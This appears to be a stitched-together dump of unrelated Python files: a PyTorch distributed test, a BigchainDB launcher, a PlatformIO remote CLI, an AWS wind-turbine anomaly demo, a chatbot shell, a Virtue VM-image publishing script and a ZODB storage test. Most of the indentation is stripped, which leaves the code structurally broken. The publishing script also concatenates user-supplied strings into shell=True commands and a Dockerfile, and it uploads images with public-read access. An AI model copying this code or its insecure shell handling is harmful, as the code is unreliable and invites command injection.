rank_to_GPU = self._init_multigpu_helper()
gpus = list(rank_to_GPU[rank])
self._test_DistributedDataParallel(gpu_subset=gpus, rank=rank)
# test output_device
self._test_DistributedDataParallel(gpu_subset=gpus, rank=rank, output_device=torch.device('cuda'))
# test device_ids
gpus = list(map(lambda i: torch.device('cuda:' + str(i)), gpus))
self._test_DistributedDataParallel(gpu_subset=gpus, rank=rank, output_device=torch.device('cuda'))
if BACKEND == "gloo" or BACKEND == "nccl":
WORLD_SIZE = os.environ["WORLD_SIZE"]
class TestDistBackend(TestCase, _DistTestBase):
MANAGER_PROCESS_RANK = -1
@staticmethod
def manager_join(fn):
@wraps(fn)
def wrapper(self):
if self.rank == self.MANAGER_PROCESS_RANK:
self._join_and_reduce(fn)
else:
fn(self)
return wrapper
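        # manager_join wraps every test_* method (see setUpClass below): the manager
        # process (rank == MANAGER_PROCESS_RANK) joins the spawned worker processes
        # and reduces their exit codes, while each worker rank runs the test body.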
@classmethod
def setUpClass(cls):
os.environ["MASTER_ADDR"] = str(MASTER_ADDR)
os.environ["MASTER_PORT"] = str(MASTER_PORT)
os.environ["WORLD_SIZE"] = str(WORLD_SIZE)
for attr in dir(cls):
if attr.startswith("test"):
fn = getattr(cls, attr)
setattr(cls, attr, cls.manager_join(fn))
def setUp(self):
# Adding this hack until we fix the FileStore to delete its
# content at the end
global INIT_METHOD
if INIT_METHOD.startswith("file://"):
_, filename = tempfile.mkstemp(prefix=FOLDER)
INIT_METHOD = "file://{}".format(filename)
self.processes = []
self.rank = self.MANAGER_PROCESS_RANK
Barrier.init()
for rank in range(int(WORLD_SIZE)):
self.processes.append(self._spawn_process(rank))
def tearDown(self):
for p in self.processes:
p.terminate()
def _spawn_process(self, rank):
os.environ["RANK"] = str(rank)
name = "process " + str(rank)
process = multiprocessing.Process(target=self._run, name=name, args=(rank,))
process.start()
return process
def _run(self, rank):
self.rank = rank
try:
dist.init_process_group(
init_method=INIT_METHOD,
backend=BACKEND,
world_size=int(WORLD_SIZE),
rank=self.rank
)
except RuntimeError as e:
if "recompile" in e.args[0]:
sys.exit(SKIP_IF_BACKEND_UNAVAILABLE)
# sys.exit(0)
raise
# Execute barrier prior to running test to ensure that every process
# has finished initialization and that the following test
# immediately exiting due to a skip doesn't cause flakiness.
self._barrier()
# self.id() == e.g. '__main__.TestDistributed.test_get_rank'
            # We're retrieving the corresponding test and executing it.
getattr(self, self.id().split(".")[2])()
self._barrier()
dist.destroy_process_group()
sys.exit(0)
def _join_and_reduce(self, fn):
skip_ok = (
getattr(fn, "skip_if_no_cuda_distributed", False) or
getattr(fn, "skip_if_no_gpu", False) or
getattr(fn, "skip_if_small_worldsize", False)
)
join_timeout = get_timeout(self.id())
for rank, process in enumerate(self.processes):
process.join(join_timeout)
self.assertFalse(
process.is_alive(),
"Timeout waiting for rank %d to terminate" % rank)
first_process = self.processes[0]
for p in self.processes:
self.assertEqual(p.exitcode, first_process.exitcode)
if first_process.exitcode == SKIP_IF_BACKEND_UNAVAILABLE:
raise unittest.SkipTest("Compiled without the " + BACKEND + " backend")
if skip_ok:
# do this first so we don't give an error message about
# mismatched exit codes if the first isn't valid
assert (
first_process.exitcode == 0 or
first_process.exitcode == SKIP_IF_NO_CUDA_EXIT_CODE or
first_process.exitcode == SKIP_IF_NO_GPU_EXIT_CODE or
first_process.exitcode == SKIP_IF_SMALL_WORLDSIZE_EXIT_CODE
)
if first_process.exitcode == SKIP_IF_NO_CUDA_EXIT_CODE:
raise unittest.SkipTest("cuda is not available")
if first_process.exitcode == SKIP_IF_NO_GPU_EXIT_CODE:
raise unittest.SkipTest(
"One unique gpu per process is not available"
)
if first_process.exitcode == SKIP_IF_SMALL_WORLDSIZE_EXIT_CODE:
raise unittest.SkipTest("worldsize is too small to run group tests")
self.assertEqual(first_process.exitcode, 0)
elif BACKEND == "mpi":
WORLD_SIZE = os.environ["WORLD_SIZE"]
dist.init_process_group(init_method=INIT_METHOD, backend="mpi")
class TestMPI(TestCase, _DistTestBase):
pass
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
processes.py
|
import logging
import multiprocessing as mp
import bigchaindb
from bigchaindb.pipelines import vote, block, election, stale
from bigchaindb.web import server
logger = logging.getLogger(__name__)
BANNER = """
****************************************************************************
* *
* Initialization complete. BigchainDB Server is ready and waiting. *
* You can send HTTP requests via the HTTP API documented in the *
* BigchainDB Server docs at: *
* https://bigchaindb.com/http-api *
* *
* Listening to client connections on: {:<15} *
* *
****************************************************************************
"""
def start():
logger.info('Initializing BigchainDB...')
# start the processes
logger.info('Starting block')
block.start()
logger.info('Starting voter')
vote.start()
logger.info('Starting stale transaction monitor')
stale.start()
logger.info('Starting election')
election.start()
# start the web api
app_server = server.create_server(bigchaindb.config['server'])
p_webapi = mp.Process(name='webapi', target=app_server.run)
p_webapi.start()
# start message
logger.info(BANNER.format(bigchaindb.config['server']['bind']))
|
remote.py
|
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
from os import getcwd
from os.path import isfile, join
from tempfile import mkdtemp
from time import sleep
import click
from platformio import exception, util
from platformio.commands.device import device_monitor as cmd_device_monitor
from platformio.managers.core import pioplus_call
# pylint: disable=unused-argument
@click.group("remote", short_help="PIO Remote")
@click.option("-a", "--agent", multiple=True)
def cli(**kwargs):
pass
@cli.group("agent", short_help="Start new agent or list active")
def remote_agent():
pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
"-d",
"--working-dir",
envvar="PLATFORMIO_REMOTE_AGENT_DIR",
type=click.Path(
file_okay=False, dir_okay=True, writable=True, resolve_path=True))
def remote_agent_start(**kwargs):
pioplus_call(sys.argv[1:])
@remote_agent.command("reload", short_help="Reload agents")
def remote_agent_reload():
pioplus_call(sys.argv[1:])
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
pioplus_call(sys.argv[1:])
@cli.command(
"update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
"-c",
"--only-check",
is_flag=True,
help="Do not update, only check for new version")
def remote_update(only_check):
pioplus_call(sys.argv[1:])
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
"-d",
"--project-dir",
default=getcwd,
type=click.Path(
exists=True,
file_okay=True,
dir_okay=True,
writable=True,
resolve_path=True))
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
def remote_run(**kwargs):
pioplus_call(sys.argv[1:])
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
"-d",
"--project-dir",
default=getcwd,
type=click.Path(
exists=True,
file_okay=False,
dir_okay=True,
writable=True,
resolve_path=True))
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
def remote_test(**kwargs):
pioplus_call(sys.argv[1:])
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
def device_list(json_output):
pioplus_call(sys.argv[1:])
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option(
"--baud", "-b", type=int, default=9600, help="Set baud rate, default=9600")
@click.option(
"--parity",
default="N",
type=click.Choice(["N", "E", "O", "S", "M"]),
help="Set parity, default=N")
@click.option(
"--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
"--xonxoff",
is_flag=True,
help="Enable software flow control, default=Off")
@click.option(
"--rts",
default=None,
type=click.IntRange(0, 1),
help="Set initial RTS line state")
@click.option(
"--dtr",
default=None,
type=click.IntRange(0, 1),
help="Set initial DTR line state")
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
"--encoding",
default="UTF-8",
help="Set the encoding for the serial port (e.g. hexlify, "
"Latin1, UTF-8), default: UTF-8")
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
"--eol",
default="CRLF",
type=click.Choice(["CR", "LF", "CRLF"]),
help="End of line mode, default=CRLF")
@click.option(
"--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
"--exit-char",
type=int,
default=3,
help="ASCII code of special character that is used to exit "
"the application, default=3 (Ctrl+C)")
@click.option(
"--menu-char",
type=int,
default=20,
help="ASCII code of special character that is used to "
"control miniterm (menu), default=20 (DEC)")
@click.option(
"--quiet",
is_flag=True,
help="Diagnostics: suppress non-error messages, default=Off")
@click.pass_context
def device_monitor(ctx, **kwargs):
def _tx_target(sock_dir):
try:
pioplus_call(sys.argv[1:] + ["--sock", sock_dir])
except exception.ReturnErrorCode:
pass
sock_dir = mkdtemp(suffix="pioplus")
sock_file = join(sock_dir, "sock")
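    # pioplus (running in the background thread below) writes the name of the
    # forwarded serial port into sock_file; we poll for that file and then hand
    # the port over to the local device monitor via ctx.invoke().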
try:
t = threading.Thread(target=_tx_target, args=(sock_dir, ))
t.start()
while t.is_alive() and not isfile(sock_file):
sleep(0.1)
if not t.is_alive():
return
kwargs['port'] = util.get_file_contents(sock_file)
ctx.invoke(cmd_device_monitor, **kwargs)
t.join(2)
finally:
util.rmtree_(sock_dir)
|
windfarm.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import threading
import math
import random
import pywt
import numpy as np
import pandas as pd
import logging
import time
import os
from turbine import WindTurbine
from edgeagentclient import EdgeAgentClient
class WindTurbineFarm(object):
"""
This is the application class. It is respoisible for:
- Creating virtual edge devices (as threads)
- Launch one Edge Agent in each virtual device
- Load the Anomaly detection for the Wind Turbine in the Edge Agent
- Launch the Virtual Wind Turbines
- Launch a Edge Agent Client that integrates the Wind Turbine with the Edge Device
- Display the UI
"""
def __init__(self, n_turbines):
self.artifacts_path = os.environ.get("ARTIFACTS_PATH")
self.raw_data = pd.read_csv(f'{self.artifacts_path}/dataset_wind.csv.gz', compression="gzip", sep=',', low_memory=False).values
self.n_turbines = n_turbines
self.turbines = [WindTurbine(i, self.raw_data) for i in range(self.n_turbines)]
self.data_buffer = [[] for i in range(self.n_turbines)]
## launch edge agent clients
self.edge_agent = EdgeAgentClient('/tmp/aws.greengrass.SageMakerEdgeManager.sock')
self.model_meta = [{'model_name':None} for i in range(self.n_turbines)]
# we need to load the statistics computed in the data prep notebook
        # these statistics will be used to normalize the input
self.raw_std = np.load(f'{self.artifacts_path}/raw_std.npy')
self.mean = np.load(f'{self.artifacts_path}/mean.npy')
self.std = np.load(f'{self.artifacts_path}/std.npy')
# then we load the thresholds computed in the training notebook
# for more info, take a look on the Notebook #2
self.thresholds = np.load(f'{self.artifacts_path}/thresholds.npy')
# configurations to format the time based data for the anomaly detection model
# If you change these parameters you need to retrain your model with the new parameters
self.INTERVAL = 5 # seconds
        self.TIME_STEPS = 20 * self.INTERVAL  # 20 samples/sec (one every 50ms) * INTERVAL seconds
self.STEP = 10
# these are the features used in this application
        self.feature_ids = [8, 9, 10, 7, 22, 5, 6]  # qx, qy, qz, qw, wind_speed_rps, rps, voltage
self.n_features = 6 # roll, pitch, yaw, wind_speed, rotor_speed, voltage
self.running = False # running status
        # minimal buffer length for denoising. We need to accumulate some samples before denoising
self.min_num_samples = 500
self.max_buffer_size = 500
for idx in range(n_turbines):
for j in range(self.max_buffer_size):
self.__read_next_turbine_sample__(idx)
def __create_dataset__(self, X, time_steps=1, step=1):
"""
This encodes a list of readings into the correct shape
expected by the model. It uses the concept of a sliding window
"""
Xs = []
for i in range(0, len(X) - time_steps, step):
v = X[i:(i + time_steps)]
Xs.append(v)
return np.array(Xs)
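    # Worked example: with len(X) == 8, time_steps == 3 and step == 2 the loop
    # visits i = 0, 2, 4, producing windows X[0:3], X[2:5] and X[4:7], so the
    # result has shape (3, 3, n_features).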
def __euler_from_quaternion__(self, x, y, z, w):
"""
Convert a quaternion into euler angles (roll, pitch, yaw)
roll is rotation around x in radians (counterclockwise)
pitch is rotation around y in radians (counterclockwise)
yaw is rotation around z in radians (counterclockwise)
"""
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
return roll_x, pitch_y, yaw_z # in radians
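    # Sanity check: the identity quaternion (x, y, z, w) = (0, 0, 0, 1) maps to
    # (roll, pitch, yaw) = (0, 0, 0), and (0, 0, sin(pi/4), cos(pi/4)) maps to a
    # pure yaw of pi/2.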
def __wavelet_denoise__(self, data, wavelet, noise_sigma):
'''
Filter accelerometer data using wavelet denoising
Modification of F. Blanco-Silva's code at: https://goo.gl/gOQwy5
'''
wavelet = pywt.Wavelet(wavelet)
levels = min(5, (np.floor(np.log2(data.shape[0]))).astype(int))
# Francisco's code used wavedec2 for image data
wavelet_coeffs = pywt.wavedec(data, wavelet, level=levels)
threshold = noise_sigma*np.sqrt(2*np.log2(data.size))
new_wavelet_coeffs = map(lambda x: pywt.threshold(x, threshold, mode='soft'), wavelet_coeffs)
return pywt.waverec(list(new_wavelet_coeffs), wavelet)
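    # Note: __detect_anomalies__ below calls this once per feature column, using
    # the per-feature standard deviation loaded from raw_std.npy as noise_sigma.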
def __del__(self):
"""Destructor"""
self.halt()
def is_noise_enabled(self, turbine_id):
return [self.turbines[turbine_id].is_noise_enabled('Vib'),
self.turbines[turbine_id].is_noise_enabled('Rot'),
self.turbines[turbine_id].is_noise_enabled('Vol')]
def __data_prep__(self, turbine_id, buffer):
"""
This method is called for each reading.
Here we do some data prep and accumulate the data in the buffer
for denoising
"""
new_buffer = []
for data in buffer:
roll,pitch,yaw = self.__euler_from_quaternion__(
data[self.feature_ids[0]],data[self.feature_ids[1]],
data[self.feature_ids[2]],data[self.feature_ids[3]]
)
row = [roll,pitch,yaw, data[self.feature_ids[4]],data[self.feature_ids[5]], data[self.feature_ids[6]]]
new_buffer.append(row)
return np.array(new_buffer)
def __prep_turbine_sample__(self, turbine_id, data):
vib_noise,rot_noise,vol_noise = self.is_noise_enabled(turbine_id)
        #np.array([8, 9, 10, 7, 22, 5, 6])  # qx, qy, qz, qw, wind_speed_rps, rps, voltage
if vib_noise: data[self.feature_ids[0:4]] = np.random.rand(4) * 100 # out of the radians range
if rot_noise: data[self.feature_ids[5]] = np.random.rand(1) * 100 # out of the normalized wind range
if vol_noise: data[self.feature_ids[6]] = int(np.random.rand(1)[0] * 10000) # out of the normalized voltage range
self.data_buffer[turbine_id].append(data)
if len(self.data_buffer[turbine_id]) > self.max_buffer_size:
del self.data_buffer[turbine_id][0]
def get_raw_data(self, turbine_id):
assert(turbine_id >= 0 and turbine_id < len(self.data_buffer))
self.__read_next_turbine_sample__(turbine_id)
return self.data_buffer[turbine_id]
def __read_next_turbine_sample__(self, turbine_id):
self.__prep_turbine_sample__(turbine_id, self.turbines[turbine_id].read_next_sample() )
def __detect_anomalies__(self):
"""
Keeps processing the data collected from the turbines
and do anomaly detection. It reports to each turbine the
anomalies detected (through a callback)
"""
while self.running:
# for each turbine, check the buffer
start_time = time.time()
for idx in range(self.n_turbines):
buffer = self.get_raw_data(idx)
if len(buffer) >= self.min_num_samples:
# create a copy & prep the data
data = self.__data_prep__(idx, np.array(buffer) )
if not self.edge_agent.is_model_loaded(self.model_meta[idx]['model_name']):
print('model is not loaded')
continue
# denoise
data = np.array([self.__wavelet_denoise__(data[:,i], 'db6', self.raw_std[i]) for i in range(self.n_features)])
data = data.transpose((1,0))
# normalize
data -= self.mean
data /= self.std
data = data[-(self.TIME_STEPS+self.STEP):]
# create the dataset and reshape it
x = self.__create_dataset__(data, self.TIME_STEPS, self.STEP)
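                    # Each window holds TIME_STEPS == 100 readings per feature, so it can be
                    # reshaped into a 10x10 "image" per feature for the model below.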
x = np.transpose(x, (0, 2, 1)).reshape(x.shape[0], self.n_features, 10, 10)
# run the model
p = self.edge_agent.predict(self.model_meta[idx]['model_name'], x)
if p is not None:
a = x.reshape(x.shape[0], self.n_features, 100).transpose((0,2,1))
b = p.reshape(p.shape[0], self.n_features, 100).transpose((0,2,1))
# check the anomalies
pred_mae_loss = np.mean(np.abs(b - a), axis=1).transpose((1,0))
values = np.mean(pred_mae_loss, axis=1)
anomalies = (values > self.thresholds)
print("detect anomalies: ", anomalies)
elapsed_time = time.time() - start_time
            time.sleep(max(0.0, 0.5 - elapsed_time))  # avoid a negative sleep when processing took longer than 0.5s
def load_model(self, model_name, model_version):
logging.info("Loading model %s version %s" % ( model_name, model_version))
model_path = os.environ.get("MODEL_PATH")
ret = self.edge_agent.load_model(model_name, model_path)
if ret is not None:
for device_id in range(self.n_turbines):
self.model_meta[device_id]['model_name'] = model_name
self.model_meta[device_id]['model_path'] = model_path
self.model_meta[device_id]['model_version'] = model_version
def start(self):
"""
Run the main application by creating the Edge Agents, loading the model and
kicking-off the anomaly detector program
"""
self.load_model("WindTurbineAnomalyDetection", "1.0")
if not self.running:
self.running = True
logging.info("Starting the anomaly detector loop...")
# finally start the anomaly detection loop
self.processing = threading.Thread(target=self.__detect_anomalies__)
self.processing.start()
def halt(self):
"""
Destroys the application and halts the agents & turbines
"""
if self.running:
self.running = False
self.processing.join()
|
console.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import cmd
import sys
from multiprocessing import Process
from os.path import abspath, dirname
sys.path.append(abspath(dirname(abspath(__file__)) + '../../../'))
from core.brain.main import Brain, worker
from core.config.settings import PEOPLE
import zmq
class Shell(cmd.Cmd):
"""Simple command processor example."""
prompt = 'smarty-bot > '
def do_prompt(self, line):
"Change the interactive prompt"
self.prompt = line + '> '
def default(self, req):
"""docstring for default"""
context = zmq.Context()
request = {
'request': req,
'from': 'jabber',
'cmd_path': req.split(),
'cmd_args': req,
'sender': PEOPLE['admin']['email'],
'uuid': ''
}
b = Brain()
response = b.react_on(request)
##check workers activity
w = response.get('worker', None)
if w:
w['addr'] = 'ipc:///tmp/smarty-brain-worker-'
p = Process(target=worker, kwargs=w)
p.start()
w['addr'] = 'ipc:///tmp/smarty-brain-worker-%d' % p.pid
ws = context.socket(zmq.REQ)
ws.connect(w['addr'])
ws.send_json({'cmd': 'run'})
response = ws.recv_json()
if response:
print(response['text'])
#cont = response.get('continue', '')
ws.send_json({'cmd': 'terminate'})
ws.close()
p.terminate()
else:
print(response['text'])
def do_EOF(self, line):
return True
if __name__ == '__main__':
Shell().cmdloop()
|
publish.py
|
import subprocess
import json
import multiprocessing
from multiprocessing import Process
from multiprocessing import Lock
import os.path #for basevm check
from threading import Thread
import strutil
import poolb
import sqlite_backend
import aws_utils
#todo actually queue this instead of just spamming them all at once?
from time import sleep
from pprint import pprint
from traceback import print_exc
import tempfile
nbdlock = Lock()
def queue_role_creation(role):
aws_utils.grabAccountNum()
#just starts up a thread
#multiprocess has some issues with the sqlite DB
# t = Process(target=runRoleCreate, args = (role,))
t = Thread(target=runRoleCreate, args = (role,))
t.start()
multiprocessing.active_children()
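# Illustrative shape of the 'role' payload expected below (hypothetical values;
# the field names come from runRoleCreatePython):
#   role = {
#       'roleID': 'role-1234',
#       'applications': [
#           {'install': 'firefox', 'postInstall': 'echo done'},
#       ],
#   }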
'''
def queue_efs_creation():
aws_utils.grabAccountNum()
#just starts up a thread
#multiprocess has some issues with the sqlite DB
# t = Process(target=runRoleCreate, args = (role,))
t = Thread(target=runEfsCreate)
t.start()
multiprocessing.active_children()
'''
dockerdir = './docker'
builddir = './dockerbuild'
#vmdir = './vmbuild'
vmdir = './vmcus'
vmorigdir = './vmorig'
vmorigfname = 'virtuevm.qcow2'
vmorig = vmorigdir + '/' + vmorigfname
virtueimagesdir = '/tmp/virtueimages'
virtuevmsdir = '/tmp/virtuevms'
dockfile = ''
def readDockFile():
global dockfile
if not dockfile:
#todo move to a .template
with open(dockerdir + '/' + 'Dockerfile') as f:
dockfile = f.read()
return dockfile
'''
def readEfsFile():
with open(dockerdir + '/' + 'efsfile') as f:
efsfile = f.read()
return efsfile
'''
#verifies that the orig image is there
def getBaseVm():
with nbdlock:
if os.path.isfile(vmorig): #needs to be inside this check to avoid re-generating this multiple times (example, a bunch of roles are created at the start)
return vmorig
vmtemp = vmorig + '.temp'
vmtempfname = vmorigfname + '.temp'
try:
os.remove(vmtemp)
except:
pass
print('Generating base virtuevm image in ' + vmtemp)
        #might be able to get this parallelizable up to 16x, but for now we are just going to lock on it
deppy = subprocess.run('for f in /dev/nbd*; do sudo qemu-nbd -d ${f} ; done', shell=True);
#todo auto figure out vm size based on size of virtueimage???????
#todo detect errors with this?
vmcreat = subprocess.run('cd ' + vmorigdir + ' && chmod +x ./alpine-make-vm-image && chmod +x ./alpineconfigure.sh && sudo ./alpine-make-vm-image --image-format qcow2 --image-size 10G -b v3.9 --packages "$(cat alpinepackages)" -c ' + vmtempfname + ' -- ./alpineconfigure.sh', shell=True, check=True);
        #shrink image and also finalize it
vmconvert = subprocess.run(['qemu-img', 'convert', '-O', 'qcow2', vmtemp, vmorig], check=True)
tsize = os.path.getsize(vmtemp)
fsize = os.path.getsize(vmorig)
print("\ttemp size: " + str(tsize >> 20) + "MB\n\tfinal size: " + str(fsize >> 20) + "MB\n\tdelta size: " + str((tsize - fsize)>>10) + "KB\n")
try:
os.remove(vmtemp)
except:
pass
return vmorig
def roleBake(role):
roleID = role['roleID']
virtuevmfile = roleID +'.qcow2'
srcimg = 'https://s3.amazonaws.com/' + aws_utils.grabVirtueBucket() + '/' + virtuevmfile
dstimg = srcimg + '_baked'
sqlite_backend.global_sqlite_db.role_set_status(role['roleID'], 'baking')
bakeid = strutil.genbakeid()
poolb.poolbake(bakeid,
srcimg, dstimg,
{"bakeID": bakeid},
'VIRTUEID=%s\n' % "BAKE")
while True:
sleep(10)
try:
bb = poolb.bakelist(bakeid = bakeid)
pprint(bb)
if len(bb) > 0 and bb[0].get('state') == 'completed':
break
except:
print_exc()
#ok its baked, lets remove it
poolb.bakedestroy(bakeid)
#todo errors
#this will deprecate runRoleCreate
#this whole thing needs to be wrapped in a try-except
def runRoleCreatePython(role):
registry = aws_utils.grabAccountNum() + '.dkr.ecr.us-east-1.amazonaws.com'
roleID = role['roleID']
#todo this should be maketmp
## repodir = repodir + '/' + roleID
repodir = tempfile.mkdtemp()
virtueimage = virtueimagesdir + '/' + roleID + '.tar'
virtuevmfile = roleID +'.qcow2'
virtuevm = virtuevmsdir + '/' + virtuevmfile
try:
lp = subprocess.run('aws ecr get-login --no-include-email | bash', shell=True, check=True)
# create the repo. it will error if the repo already exists, we dont care
cr = subprocess.run(['aws', 'ecr', 'create-repository', '--repository-name', roleID])
#sync it up?
cr = subprocess.run(['rsync', '--no-relative', '-r', dockerdir + '/', repodir], check=True)
#import dockerfile
mydockfile = readDockFile()
#generate install strings
appstring = ''
pinststring = ''
for z in role['applications']:
if 'install' in z and z['install']:
appstring = appstring + ' ' + z['install'].strip()
if 'postInstall' in z and z['postInstall']:
zimpy = z['postInstall'].replace('\n', ' \\\n')
pinststring = pinststring + '\nRUN ' + zimpy + '\n\n'
#apply them
if appstring:
zappstring = 'RUN apt-get update -y && apt-get install -y ' + appstring
mydockfile = mydockfile.replace('#__INSTALL', zappstring)
if pinststring:
mydockfile = mydockfile.replace('#__POSTINSTALL', pinststring)
#we dont use TARGZ yet
        #output Dockerfile
with open(repodir + '/Dockerfile', 'w') as kl:
kl.write(mydockfile)
#build docker image
dbo = subprocess.run(['docker', 'build', '-t', registry + '/' + roleID, repodir + '/'], check=True)
#create VM if a virlet, else just upload it to ecs (else is further down)
sqlite_backend.global_sqlite_db.role_set_status(role['roleID'], 'bundling')
#export it
print("exporting dockerimage")
exd = subprocess.run(['mkdir', '-p', virtueimagesdir])
exp = subprocess.run(['docker', 'tag', registry + '/' + roleID, roleID])
exp = subprocess.run(['docker', 'save', '-o', virtueimage, roleID])
##exu = subprocess.run(['aws', 's3', 'cp', '/tmp/virtuedocks/'+roleID+'.tar', 's3://siege-virtueimages/'+roleID+'.tar'])
vimgsize = os.path.getsize(virtueimage)
print("\tDockerImage size: " + str(vimgsize >> 20) + " MB\n")
orig = getBaseVm()
print('Using orig virtuevm image from ' + orig)
#basically a recreation of bettermakeimage.sh
print("customizing vm now")
exd = subprocess.run(['mkdir', '-p', virtuevmsdir], check = True)
rmer = subprocess.run(['rm', '-f', virtuevm]);
#new, this can be outside the critical lock zone because it will only reach here after getBaseVm returns
cper = subprocess.run(['rsync', '--no-relative', orig, virtuevm], check=True);
        #might be able to get this parallelizable up to 16x, but for now we are just going to lock on it
with nbdlock:
deppy = subprocess.run('for f in /dev/nbd*; do sudo qemu-nbd -d ${f} ; done', shell=True);
#todo auto figure out vm size based on size of virtueimage????
# vmcreat = subprocess.run('cd ' + vmdir + ' && chmod +x ./alpine-make-vm-image && chmod +x ./alpineconfigure.sh && sudo ./alpine-make-vm-image --image-format qcow2 --image-size 10G -b v3.9 --packages "$(cat alpinepackages)" --virtueimage "' + virtueimage + '" -c ' + virtuevm + ' -- ./alpineconfigure.sh', shell=True, check=True);
vmcreat = subprocess.run('cd ' + vmdir + ' && chmod +x ./brunchable-image && chmod +x ./alpineconfigure.sh && sudo ./brunchable-image --virtueimage "' + virtueimage + '" -c ' + virtuevm + ' -- ./alpineconfigure.sh', shell=True, check=True);
vmchown = subprocess.run('sudo chown $USER ' + virtueimage, shell=True)
#upload to s3
sqlite_backend.global_sqlite_db.role_set_status(role['roleID'], 'uploading')
vmupload = subprocess.run(['aws', 's3', 'cp', virtuevm, 's3://' + aws_utils.grabVirtueBucket() + '/' + virtuevmfile, '--acl', 'public-read'])
fimgsize = os.path.getsize(virtuevm)
print("\tFinal VirtueImage size: " + str(fimgsize >> 20) + " MB\n")
#bake the bread!
roleBake(role)
#clean up
rmo = subprocess.run(['rm', '-rf', 'app.tar.gz', repodir, virtueimage, virtuevm])
except:
try:
rmo = subprocess.run(['rm', '-rf', 'app.tar.gz', repodir , virtueimage, virtuevm])
except:
pass
raise
#queue a bake
# rmo = subprocess.run(['rm', '-rf', 'app.tar.gz', repodir , '/tmp/virtueimages/'+roleID+'/'])
#force nodes to grab it from s3
#todo make sure no bash escape from this
# kube.runcommandonallnodes('sudo mkdir -p /tmp/virtueimages/'+roleID+'/ && aws s3 cp s3://siege-virtueimages/'+roleID+'.tar /tmp/virtueimages/'+roleID+'/image.tar', sudo=False)
def cleanCache():
try:
subprocess.run(r"""[ ! -z "$(df -P | awk '$6 == "/" && 0+$5 >= 75 {print}')" ] && docker system prune -a -f --volumes""", shell=True, timeout=30)
except:
print_exc()
def runRoleCreate(role):
pprint(role)
for i in range(0, 2):
try:
cleanCache()
runRoleCreatePython(role)
#success
print('Success in creating role\n')
#update the thing
sqlite_backend.global_sqlite_db.role_set_status(role['roleID'], 'ready')
return
except Exception as e:
pprint(e)
print_exc()
sqlite_backend.global_sqlite_db.role_set_status(role['roleID'], 'broken')
#lets trigger a bake i guess
'''
def runEfsCreate():
print("starting efs creation")
for i in range(0, 2):
try:
cleanCache()
runEfsCreatePython()
#success
print('Success in creating Efs\n')
return
except Exception as e:
pprint(e)
print_exc()
'''
#queue_efs_creation()
|
tests.py
|
##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
##############################################################################
# Test FileStorage packing sans GC
#
# This module is a bit of a hack. It simply copies and modifies the
# tests affected by the lack of gc in pack.
##############################################################################
import binascii
import ZODB.blob
import ZODB.tests.testblob
import doctest
import time
import unittest
import zc.FileStorage
from ZODB.serialize import referencesf
from zope.testing import setupstack
from ZODB.tests.testFileStorage import FileStorageTests
from ZODB.tests.PackableStorage import pdumps
from ZODB.tests.TransactionalUndoStorage import snooze
from zodbpickle import pickle
class ZCFileStorageTests(FileStorageTests):
blob_dir = None
def setUp(self):
self.open(create=1, packer=zc.FileStorage.packer, blob_dir=self.blob_dir)
def tearDown(self):
self._storage.close()
self._storage.cleanup()
if self.blob_dir:
ZODB.blob.remove_committed_dir(self.blob_dir)
def checkPackAllRevisions(self):
self._initroot()
eq = self.assertEqual
raises = self.assertRaises
# Create a `persistent' object
obj = self._newobj()
oid = obj.getoid()
obj.value = 1
# Commit three different revisions
revid1 = self._dostoreNP(oid, data=pdumps(obj))
obj.value = 2
revid2 = self._dostoreNP(oid, revid=revid1, data=pdumps(obj))
obj.value = 3
